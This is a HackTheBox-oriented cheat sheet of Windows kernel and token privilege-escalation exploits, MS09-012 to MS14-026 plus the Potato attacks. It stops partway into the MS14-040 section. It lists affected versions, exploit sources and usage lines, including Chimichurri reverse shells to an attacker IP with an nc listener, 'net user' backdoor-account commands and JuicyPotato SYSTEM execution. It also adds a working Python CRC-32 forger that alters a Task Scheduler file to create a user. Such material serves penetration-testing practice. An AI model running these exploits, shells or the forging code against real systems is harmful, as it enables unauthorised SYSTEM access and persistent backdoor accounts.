Windows Kernel Exploit Cheat Sheet for [HackTheBox]
This is a cheat sheet for Windows kernel exploits.
Of the exploits that windows-exploit-suggester.py and Sherlock.ps1 report, the ones that looked actually usable came to about 30, so I figured that many could be researched ahead of time, and did so.
I have collected sites with precompiled binaries, or scripts, and ranked them by priority.
I rate them high, medium or low, but the criteria are rough: whether the binary actually ran, whether an RDP connection is needed, whether a Metasploit module exists, and so on. I change the ratings often, so treat them only as a guide.
Where I found out the usage and similar details I have written them down; for the ones I could not figure out I have not written much. I push those down my own priority list.
If you get stuck on Windows privilege escalation on HTB, I hope this is useful!
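As an added example (not part of the original post, and not code from windows-exploit-suggester or Sherlock), the following Python does the first triage step that the rest of this page supports: it parses `systeminfo` output, keeps the bulletins whose affected versions include the host's Windows version, drops the ones whose public exploits are 32-bit only when the host is x64, and drops the ones whose fix (KB) is already installed. The bulletin table is a hand-picked subset of this page; the version sets, x86-only flags, priorities and notes come from the sections below, while the KB numbers not quoted on this page (MS10-015, MS11-046, MS11-080, MS14-002, MS14-070) are taken from the corresponding Microsoft bulletins. The two `systeminfo` samples and their host names are constructed, not captures from real boxes.

```python
import re

# Subset of the bulletins on this page. versions = Windows major.minor
# families the bulletin covers; x86_only = the public exploit is 32-bit only.
# KB numbers marked "(bulletin)" come from the Microsoft bulletin, the others
# are quoted on this page.
BULLETINS = [
    # bulletin,  KB,          versions,                                  x86_only, priority, note
    ("MS10-015", "KB977165",  {"5.0", "5.1", "5.2", "6.0", "6.1"},        True,  "high",   "KiTrap0D; new SYSTEM window, RDP may be needed"),      # KB (bulletin)
    ("MS10-059", "KB982799",  {"6.0", "6.1"},                             False, "high",   "Chimichurri; reverse shell to <ip> <port>"),
    ("MS11-046", "KB2503665", {"5.1", "5.2", "6.0", "6.1"},               True,  "high",   "afd.sys; SYSTEM shell in current window"),            # KB (bulletin)
    ("MS11-080", "KB2592799", {"5.1", "5.2"},                             True,  "high",   "AfdJoinLeaf; public exploits are 32-bit"),            # KB (bulletin)
    ("MS13-053", "KB2850851", {"5.1", "5.2", "6.0", "6.1", "6.2"},        True,  "medium", "schlamperei.x86.dll; SYSTEM shell in new window"),
    ("MS14-002", "KB2914368", {"5.1", "5.2"},                             True,  "high",   "NDProxy; Routing and Remote Access must be running"),  # KB (bulletin)
    ("MS14-058", "KB3000061", {"5.1", "5.2", "6.0", "6.1", "6.2", "6.3"}, False, "high",   "TrackPopupMenu; x86 and x64 tested"),
    ("MS14-070", "KB2989935", {"5.2"},                                    True,  "high",   "tcpip.sys IOCTL; Server 2003 SP2 only"),              # KB (bulletin)
]

PRIORITY = {"high": 0, "medium": 1, "low": 2}


def parse_systeminfo(text: str) -> dict:
    """Extract the fields triage needs from `systeminfo` output."""
    def field(name: str) -> str:
        m = re.search(r"^" + re.escape(name) + r":\s*(.+)$", text, re.M)
        return m.group(1).strip() if m else ""

    ver = re.match(r"(\d+\.\d+)\.(\d+)(?:\s+Service Pack\s+(\d+))?", field("OS Version"))
    return {
        "os_name": field("OS Name"),
        "version": ver.group(1) if ver else "",          # e.g. "5.2" for Server 2003
        "build": int(ver.group(2)) if ver else 0,
        "service_pack": int(ver.group(3)) if ver and ver.group(3) else 0,
        "arch": "x64" if "x64" in field("System Type").lower() else "x86",
        "hotfixes": set(re.findall(r"\[\d+\]:\s*((?:KB|Q)\d+)", text)),
    }


def suggest(text: str) -> list:
    """Return (bulletin, priority, note) tuples worth trying, highest priority first."""
    host = parse_systeminfo(text)
    hits = []
    for name, kb, versions, x86_only, priority, note in BULLETINS:
        if host["version"] not in versions:
            continue            # OS family is not in the affected list
        if x86_only and host["arch"] != "x86":
            continue            # a 32-bit exploit will not work against a 64-bit kernel
        if kb in host["hotfixes"]:
            continue            # the fix is installed
        hits.append((name, priority, note))
    return sorted(hits, key=lambda h: PRIORITY[h[1]])


# Constructed samples (not captures from real boxes): a Server 2003 SP2 x86
# host with one hotfix, and a Windows 7 x64 host that has the MS14-058 fix.
SAMPLE_2003 = """\
Host Name:                 WEBSRV
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
"""

SAMPLE_WIN7 = """\
Host Name:                 WKSTN01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB3000061
"""

if __name__ == "__main__":
    for sample in (SAMPLE_2003, SAMPLE_WIN7):
        host = parse_systeminfo(sample)
        print(f"{host['os_name']} {host['version']} SP{host['service_pack']} {host['arch']}")
        for name, priority, note in suggest(sample):
            print(f"  {name:<9} ({priority}) {note}")
```

Two caveats when using this against a real host: `systeminfo` only lists hotfixes it knows about (compare with `wmic qfe list`), and a service pack released after a bulletin already contains that fix even though no KB entry appears for it, so check the service pack against the per-bulletin "not affected" lists below as well. A bulletin showing up here means the OS is in scope, not that the exploit will work; the per-section notes (RDP needed, service that must be running, 32-bit only) still apply.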
- Cheat Sheet
- Potato (high)
- MS09-012 (high)
- MS10-015 (high)
- MS10-047 (low)
- MS10-059 (high)
- MS10-073 (medium)
- MS10-092 (high)
- MS11-011 (medium)
- MS11-046 (high)
- MS11-062 (high)
- MS11-080 (high)
- MS13-005 (medium)
- MS13-053 (medium)
- MS13-081 (medium)
- MS14-002 (high)
- MS14-026 (low)
- MS14-040 (high)
- MS14-058 (high)
- MS14-068 (medium)
- MS14-070 (high)
- MS15-004 (medium)
- MS15-010 (medium)
- MS15-051 (high)
- MS15-076 (medium)
- MS15-078 (medium)
- MS15-102 (low)
- MS16-014 (high)
- MS16-016 (high)
- MS16-032 (high)
- MS16-034 (very low)
- MS16-075 (medium)
- MS16-098 (high)
- MS16-135 (high)
- 最後に
Cheat Sheet
Potato (high)
affected version
Does not depend on the OS version, with two caveats: the current process must hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typical for service accounts such as IIS application pools and MSSQL), which you can check with whoami /priv; and the DCOM/OXID resolver behaviour that Rotten and Juicy Potato rely on was changed in Windows 10 1809 / Server 2019, so they do not work on those or later builds.
exploit-db
not found
github
A 64-bit JuicyPotato binary is available from its GitHub repository.
usage: JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Windows\Temp\out.txt" -t *
(-l is a local listening port, -p the program to run as SYSTEM, -a its arguments and -t the token-creation method; run JuicyPotato.exe with no arguments for the full option list, and pass a different -c <CLSID> if the default COM server is not available on the target.)
A RottenPotato binary is available from its GitHub repository.
usage: rottenpotato.exe
After running it, use the captured token to become SYSTEM as shown in the repository README (from Meterpreter: load incognito, then list_tokens -u and impersonate_token "NT AUTHORITY\SYSTEM").
metasploit
more information
MS09-012 (high)
affected version
Microsoft Windows 2000 SP4; Windows XP SP2 and SP3; Windows XP Professional x64 Edition and x64 Edition SP2; Windows Server 2003 SP1 and SP2; Windows Server 2003 x64 Edition and x64 Edition SP2; Windows Server 2003 with SP1 and with SP2 for Itanium-based Systems; Windows Vista and Vista SP1; Windows Vista x64 Edition and x64 Edition SP1; Windows Server 2008 for 32-bit Systems; Windows Server 2008 for x64-based Systems; Windows Server 2008 for Itanium-based Systems
exploit-db
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation
github
pr.exe: Usage: pr.exe <command>
usage: churrasco.exe whoami
Chimichurri.exe is unverified. Usage: Chimichurri.exe <attacker ip> 5555; it connects back to that address and port with a SYSTEM shell, so start a listener first. Note that Chimichurri is Cesar Cerrudo's exploit for MS10-059 (the Tracing feature bug), not for token kidnapping; see the MS10-059 section.
metasploit
not found
more information
Article about Chimichurri.exe (medium.com)
MS10-015 (high)
affected version
Windows Server 2003, Windows Server 2008, 7, XP: Microsoft Windows 2000 SP4; Windows XP SP2 and SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista, Vista SP1 and Vista SP2; Windows Vista x64 Edition, x64 Edition SP1 and x64 Edition SP2; Windows Server 2008 for 32-bit Systems and SP2*; Windows Server 2008 for x64-based Systems and SP2*; Windows Server 2008 for Itanium-based Systems and SP2; Windows 7 for 32-bit Systems
not affected version
Windows 7 for x64-based Systems; Windows Server 2008 R2 for x64-based Systems; Windows Server 2008 R2 for Itanium-based Systems
Even where the bulletin lists x64 editions, the KiTrap0D exploit only works on 32-bit kernels: it abuses the NTVDM (16-bit) subsystem, which does not exist on x64 Windows. If the session is already elevated the Metasploit module will not run.
exploit-db
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
github
not supported on x64
You need both vdmallowed.exe and vdmexploit.dll.
Spawns a new SYSTEM window (so an RDP session may be needed??)
vdmallowed.exe
metasploit
exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
more information
MS10-047 (low)
affected version
Windows 7 for 32-bit Systems; Windows 7 for x64-based Systems; Windows Server 2008 for 32-bit Systems and SP2; Windows Server 2008 for Itanium-based Systems and SP2; Windows Server 2008 for x64-based Systems and SP2; Windows Server 2008 R2 for Itanium-based Systems; Windows Server 2008 R2 for x64-based Systems; Windows Vista SP1 and SP2; Windows Vista x64 Edition SP1 and SP2; Windows XP SP3
not affected version
Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems
exploit-db
Microsoft Windows - nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)
Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)
github
none found (?)
metasploit
not found
more information
MS10-059 (high)
affected version
Windows Vista SP1 and SP2; Windows Vista x64 Edition SP1 and SP2; Windows Server 2008 for 32-bit Systems and SP2*; Windows Server 2008 for x64-based Systems and SP2*; Windows Server 2008 for Itanium-based Systems and SP2; Windows 7 for 32-bit Systems; Windows 7 for x64-based Systems; Windows Server 2008 R2 for x64-based Systems*; Windows Server 2008 R2 for Itanium-based Systems
not affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
exploit-db
none found (?)
github
MS10-059.exe (Chimichurri)
usage: MS10-059.exe 10.10.14.20 4447
It connects back to the given IP and port with a SYSTEM shell, so start a listener (for example nc -lvnp 4447) before running it.
Also listed: Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add"
metasploit
no
more information
MS10-073 (medium)
affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP1 and SP2; Windows Vista x64 Edition SP1 and SP2; Windows Server 2008 for 32-bit Systems and SP2*; Windows Server 2008 for x64-based Systems and SP2*; Windows Server 2008 for Itanium-based Systems and SP2; Windows 7 for 32-bit Systems; Windows 7 for x64-based Systems; Windows Server 2008 R2 for x64-based Systems*; Windows Server 2008 R2 for Itanium-based Systems
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
exploit-db
Microsoft Win32k - Keyboard Layout (MS10-073)
could not compile
github
none found (?)
metasploit
post/windows/escalate/ms10_073_kbdlayout 2010-10-12 normal Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation Description: This module exploits the keyboard layout vulnerability exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.
more information
Video of the Metasploit post module in use (YouTube)
MS10-092 (high)
affected version
Windows Vista SP1 and SP2; Windows Vista x64 Edition SP1 and SP2; Windows Server 2008 for 32-bit Systems and SP2*; Windows Server 2008 for x64-based Systems and SP2*; Windows Server 2008 for Itanium-based Systems and SP2; Windows 7 for 32-bit Systems; Windows 7 for x64-based Systems; Windows Server 2008 R2 for x64-based Systems*; Windows Server 2008 R2 for Itanium-based Systems
not affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems
exploit-db
Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)
github
Metasploit module source only
metasploit
exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.
more information
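The module description above says the scheduler validates a task file with nothing stronger than CRC-32, which is why a user who can write their own task file can also make a tampered copy pass the check. The following Python is an added example, not code from the original post or from the Metasploit module: it forges four bytes so that a modified task definition has the same CRC-32 as the original, hiding them inside an XML comment so the file stays well-formed. CRC-32 is linear, so the forging is exact rather than a brute-force search; the only loop is a retry over comment padding so that the four bytes land on printable characters. The task XML is a constructed ASCII stand-in (real task files under C:\Windows\System32\Tasks are UTF-16), and the command inserted is illustrative.

```python
import zlib

POLY = 0xEDB88320
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
# Every table entry has a distinct top byte, so the top byte of a register
# state identifies the table index that produced it when stepping backwards.
REV = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(REV) == 256


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def _unstep(reg: int, byte: int) -> int:
    """Invert one table-driven CRC-32 update, given the byte that was consumed."""
    i = REV[reg >> 24]
    return ((reg ^ TABLE[i]) << 8) | (i ^ byte)


def forge_crc32(prefix: bytes, suffix: bytes, target: int) -> bytes:
    """Return 4 bytes P such that crc32(prefix + P + suffix) == target."""
    reg_before = crc32(prefix) ^ 0xFFFFFFFF   # register state after the prefix (undo final XOR)
    reg_after = target ^ 0xFFFFFFFF           # state the suffix must start from...
    for b in reversed(suffix):                # ...found by running the suffix backwards
        reg_after = _unstep(reg_after, b)
    # Walk back through the four unknown bytes, recording table indices. The
    # low byte of each intermediate state is left at 0 and recovered below
    # from the XOR difference to the real state after the prefix.
    idx = [0] * 4
    reg = reg_after
    for k in (3, 2, 1, 0):
        idx[k] = REV[reg >> 24]
        reg = (reg ^ TABLE[idx[k]]) << 8
    diff = reg_before ^ reg
    return bytes(idx[k] ^ ((diff >> (8 * k)) & 0xFF) for k in range(4))


# Constructed stand-in for a task definition (real ones are UTF-16 XML).
ORIGINAL_TASK = (
    b'<?xml version="1.0" encoding="UTF-16"?>'
    b'<Task version="1.2"><Actions><Exec>'
    b'<Command>C:\\Windows\\System32\\notepad.exe</Command>'
    b'</Exec></Actions></Task>'
)


def tamper_task(original: bytes, new_command: bytes) -> bytes:
    """Replace the <Command> and hide a CRC-32 fix-up in an XML comment so the
    result has the same CRC-32 the scheduler stored for the original file."""
    head, tail = original.split(b"<Command>")
    _, rest = tail.split(b"</Command>", 1)
    assert rest.endswith(b"</Task>")
    body = head + b"<Command>" + new_command + b"</Command>" + rest[: -len(b"</Task>")]
    suffix = b"--></Task>"
    target = crc32(original)
    # Vary the comment padding until the four fix-up bytes are printable and
    # contain no '-', so the comment (and therefore the XML) stays well-formed.
    for pad in range(1024):
        prefix = body + b"<!--" + b" " * pad
        patch = forge_crc32(prefix, suffix, target)
        if all(0x20 <= b <= 0x7E and b != 0x2D for b in patch):
            return prefix + patch + suffix
    raise ValueError("no printable fix-up found")


if __name__ == "__main__":
    forged = tamper_task(ORIGINAL_TASK, b"C:\\Windows\\System32\\cmd.exe /c net user eve P@ss1 /add")
    print(f"original crc32 0x{crc32(ORIGINAL_TASK):08x}, forged crc32 0x{crc32(forged):08x}")
    print(forged.decode())
```

The point of the example is the check, not the exploit: any integrity mechanism that relies on a CRC can be satisfied by an attacker in constant time, which is why the fix for MS10-092 replaced the checksum rather than hiding the task files better. Against a real UTF-16 task file the four bytes would also have to decode as valid UTF-16 characters that the XML parser accepts, which is what a full exploit has to take care of.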
MS11-011 (medium)
affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP1 and SP2; Windows Vista x64 Edition SP1 and SP2; Windows Server 2008 for 32-bit Systems and SP2*; Windows Server 2008 for x64-based Systems and SP2*; Windows Server 2008 for Itanium-based Systems and SP2; Windows 7 for 32-bit Systems; Windows 7 for x64-based Systems; Windows Server 2008 R2 for x64-based Systems*; Windows Server 2008 R2 for Itanium-based Systems
not affected version
Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
exploit-db
Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)
appears to be a DoS PoC only
github
MS11-011.exe
metasploit
not found
more information
MS11-046 (high)
affected version
From the exploit header:
Vulnerable software: Windows XP SP3 x86; Windows XP Pro SP2 x64; Windows Server 2003 SP2 x86, x64 and Itanium; Windows Vista SP1 and SP2, x86 and x64; Windows Server 2008 and SP2, x86, x64 and Itanium; Windows 7 and SP1, x86 and x64; Windows Server 2008 R2 and SP1, x64 and Itanium
Supported by the exploit (x86 only): Windows XP SP3; Windows Server 2003 SP2; Windows Vista SP1 and SP2; Windows Server 2008 and SP2; Windows 7 and SP1
Tested: Windows XP Pro SP3 x86 EN [5.1.2600]; Windows Server 2003 Ent SP2 EN [5.2.3790]; Windows Vista Ult SP1 x86 EN [6.0.6001]; Windows Vista Ult SP2 x86 EN [6.0.6002]; Windows Server 2008 Dat SP1 x86 EN [6.0.6001]; Windows Server 2008 Ent SP2 x86 EN [6.0.6002]; Windows 7 HB x86 EN [6.1.7600]; Windows 7 Ent SP1 x86 EN [6.1.7601]
exploit-db
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
compile with: i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
github
MS11_46_k8.exe, ms11-046.exe
spawns a SYSTEM shell in the current window
ms11-046.exe is also available from a second repository
metasploit
no
more information
MS11-062 (high)
affected version
See the exploit header below. Description: An elevation of privilege vulnerability exists in the NDISTAPI.sys component of the Remote Access Service NDISTAPI driver. The vulnerability is caused when the NDISTAPI driver improperly validates user-supplied input when passing data from user mode to the Windows kernel. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).
exploit-db
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
Vulnerable software: Windows XP SP3 x86; Windows XP Pro SP2 x64; Windows Server 2003 SP2 x86, x64 and Itanium. Supported by the exploit: Windows XP SP3 x86; Windows Server 2003 SP2 x86. Tested: Windows XP Pro SP3 x86 EN [5.1.2600]; Windows Server 2003 Ent SP2 EN [5.2.3790]
github
40627.exe, MS11-062.exe
spawns a SYSTEM shell in the current window
metasploit
no
more information
MS11-080 (high)
affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems
not affected version
Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems and SP1; Windows 7 for x64-based Systems and SP1; Windows Server 2008 R2 for x64-based Systems and SP1; Windows Server 2008 R2 for Itanium-based Systems and SP1
Module description: This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile, will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.
exploit-db
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
github
CVE-2011-2005.py, MS11_80_k8.exe, ms11-080-AddUser.exe, ms11-080.exe
adds a user and spawns a shell in the current window
ms11-080.py and ms11-080.exe are also available from a second repository
metasploit
exploit/windows/local/ms11_080_afdjoinleaf 2011-11-30 average MS11-080 AfdJoinLeaf Privilege Escalation
more information
MS13-005 (medium)
affected version
Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems and SP1; Windows 7 for x64-based Systems and SP1; Windows Server 2008 R2 for x64-based Systems and SP1; Windows Server 2008 R2 for Itanium-based Systems and SP1; Windows 8 for 32-bit Systems; Windows 8 for 64-bit Systems; Windows Server 2012; Windows RT; plus the Server Core installations of Windows Server 2008 SP2 (32-bit and x64) and Windows Server 2008 R2 (and SP1)
not affected version
Microsoft Windows XP SP3; Microsoft Windows XP Professional x64 Edition SP2; Microsoft Windows Server 2003 SP2; Microsoft Windows Server 2003 x64 Edition SP2; Microsoft Windows Server 2003 for Itanium-based Systems SP2
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
Module description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. This issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+# does not work in Vista, so the attacker will have to check if the user is already running a command prompt and set SPAWN_PROMPT false. Three exploit techniques are available with this module. The WEB technique will execute a powershell encoded payload from a Web location. The FILE technique will drop an executable to the file system, set it to medium integrity and execute it. The TYPE technique will attempt to execute a powershell encoded payload directly from the command line, but may take some time to complete.
Note that this only moves from Low to Medium integrity inside the logged-on user's desktop session: it does not give SYSTEM by itself, and it needs an interactive session (for example over RDP) for the broadcast messages to reach a higher-integrity window.
exploit-db
Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005)
appears to be a DoS PoC only; could not compile
github
metasploit
exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
more information
MS13-053 (medium)
affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for 64-bit Systems; Windows Server 2012; Windows RT[1] (2850851)
NTUserMessageCall Win32k Kernel Pool Overflow: win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability."
exploit-db
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
github
MS13-053.exe
spawns a SYSTEM shell in a new window
metasploit
exploit/windows/local/ms13_053_schlamperei 2013-12-01 average Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
The module's payload DLL is 32-bit (schlamperei.x86.dll), so expect it to work on x86 targets only.
more information
MS13-081 (medium)
affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for 64-bit Systems; Windows Server 2012; Windows RT; Windows Server 2008 for 32-bit Systems SP2 (Server Core installation); Windows Server 2008 for x64-based Systems SP2 (Server Core installation); Windows Server 2008 R2 for x64-based Systems SP1 (Server Core installation); Windows Server 2012 (Server Core installation)
not affected version
Windows 8.1 for 32-bit Systems; Windows 8.1 for 64-bit Systems; Windows Server 2012 R2; Windows Server 2012 R2 (Server Core installation); Windows RT 8.1
MS13-081: TrackPopupMenuEx Win32k NULL Page. This module exploits a vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This module has been tested successfully on Windows 7 SP0 and Windows 7 SP1.
exploit-db
Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)
github
none found (?)
metasploit
exploit/windows/local/ms13_081_track_popup_menu 2013-10-08 average Windows TrackPopupMenuEx Win32k NULL Page
more information
MS14-002 (high)
affected version
Windows XP SP3; Windows XP Professional x64 Edition SP2; Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems
not affected version
Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows Server 2008 for Itanium-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for x64-based Systems; Windows 8.1 for 32-bit Systems; Windows 8.1 for x64-based Systems; Windows Server 2012; Windows Server 2012 R2; Windows RT; Windows RT 8.1; Server Core installations of Windows Server 2008 SP2 (32-bit and x64), Windows Server 2008 R2 SP1 (x64), Windows Server 2012 and Windows Server 2012 R2
Module description: This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system.
Check that precondition first: sc query RemoteAccess should report the service as RUNNING, otherwise neither the module nor the standalone exploits can reach the driver.
exploit-db
Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)
Tested on Windows XP SP3
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
Vulnerable software: Windows XP SP3 x86; Windows XP SP2 x86-64; Windows 2003 SP2 x86, x86-64 and IA-64. Supported by the exploit: Windows XP SP3 x86; Windows 2003 SP2 x86. Tested on: Windows XP SP3 x86 EN; Windows 2003 SP2 x86 EN. CVE ID: CVE-2013-5065.
compile with: i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
github
CVE-2013-5065.exe, CVE-2013-5065.py, MS14-002.exe
usage: MS14-002.exe XP (on Windows XP) or MS14-002.exe 2k3 (on Windows Server 2003)
spawns a SYSTEM shell in the current window
ms14-002.py and ms14-002.exe are also available from a second repository
metasploit
exploit/windows/local/ms_ndproxy 2013-11-27 average MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation
more information
MS14-026 (low)
affected version
Windows Server 2003 SP2; Windows Server 2003 x64 Edition SP2; Windows Server 2003 with SP2 for Itanium-based Systems; Windows Vista SP2; Windows Vista x64 Edition SP2; Windows Server 2008 for 32-bit Systems SP2; Windows Server 2008 for x64-based Systems SP2; Windows 7 for 32-bit Systems SP1; Windows 7 for x64-based Systems SP1; Windows Server 2008 R2 for x64-based Systems SP1; Windows Server 2008 R2 for Itanium-based Systems SP1; Windows 8 for 32-bit Systems; Windows 8 for x64-based Systems; Windows 8.1 for 32-bit Systems; Windows 8.1 for x64-based Systems; Windows Server 2012; Windows Server 2012 R2; Windows RT; Windows RT 8.1; Windows Server 2008 R2 for x64-based Systems SP1 (Server Core installation); Windows Server 2012 (Server Core installation)
not affected version
Microsoft .NET Framework 3.0 SP2; Microsoft .NET Framework 3.5 SP1; Microsoft .NET Framework 4.5.2
[M] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
This is a .NET Remoting issue rather than a kernel bug: it only matters if the target runs a .NET Remoting service (TCP channel) that you can reach, which is why it is rated low here.
exploit-db
.NET Remoting Services - Remote Command Execution
[*] http://www.exploit-db.com/exploits/35280/ -- .NET Remoting Services Remote Command Execution, PoC
github
none found (?)
metasploit
no
more information
MS14-040 (high)
affected version
